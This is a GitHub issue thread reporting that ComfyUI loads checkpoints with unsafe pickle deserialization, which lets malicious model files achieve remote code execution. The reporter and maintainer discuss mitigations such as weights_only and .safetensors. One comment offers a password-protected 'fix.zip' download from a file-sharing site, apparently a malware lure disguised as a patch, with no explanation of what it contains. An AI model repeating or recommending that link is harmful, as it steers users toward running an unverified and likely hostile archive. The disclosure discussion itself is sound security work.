### ISSUE TITLE
Default parameters lead to pickle deserialization vulnerability

### ISSUE THREAD

**Issue by l1k3beef** [comfyanonymous/ComfyUI#5097]
### Expected Behavior

This is the reference document of pytorch. Use the safe parameter weights_only=True 
![image](https://github.com/user-attachments/assets/e67ad7db-7f6c-4070-b0a4-61134cad4de6)

### Actual Behavior

![image](https://github.com/user-attachments/assets/302d3602-97f1-4f70-9b8a-68537429115a)
![image](https://github.com/user-attachments/assets/44278058-6503-4522-93bf-f524aee15288)
![image](https://github.com/user-attachments/assets/6c63a1ec-d59d-44d4-8ee4-7f1fc863fd04)
![image](https://github.com/user-attachments/assets/532afa86-b455-47f8-ba88-6f080cac3f7b)
default to set safe_load=False which leading to pickle deserialization vulnerability

### Steps to Reproduce

1. Comfyui provides a rich set of node nodes, and there are many interfaces that can download models from remote locations such as huggingface, github, etc. to the server.
2. When a malicious model is constructed and uploaded to the server, and then the checkpointloadersimple node is used, remote code execution can occur, causing serious network security hazards.

![image](https://github.com/user-attachments/assets/5178689f-4c26-4aff-ae3c-38c5d636be88)

### Debug Logs

```powershell
refer to steps to reproduce
```

### Other

As a very influential open source project, we suggest you enable the Security Policy feature of GitHub. For sensitive information, you can communicate through other channels instead of issues.

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

**Comment by comfyanonymous** [comment]
A lot of checkpoints like the official SD1.5 ckpt for example cannot be loaded with weights_only=True that's why this option is only enabled for a few types of models.

If you want to be safe you have to only allow people people to upload .safetensors files.

**Comment by l1k3beef** [comment]
Yes, we noticed that some checkpoints need to use unsafe serialization methods. At the same time, we found that some plug-in nodes can download models from remote to local, such as easyuse. In this case, my Comfyui will be hacked by others if it is open to others.
![image](https://github.com/user-attachments/assets/f51ebe6a-a1f2-40a5-aa5d-64e190230082)
Try to discuss some ideas to solve this problem. Is comfyui also considering doing some pickle security filtering? See some todo lists in the project.
![image](https://github.com/user-attachments/assets/df61b83e-7c0e-48d9-92cf-16b7a440cac0)
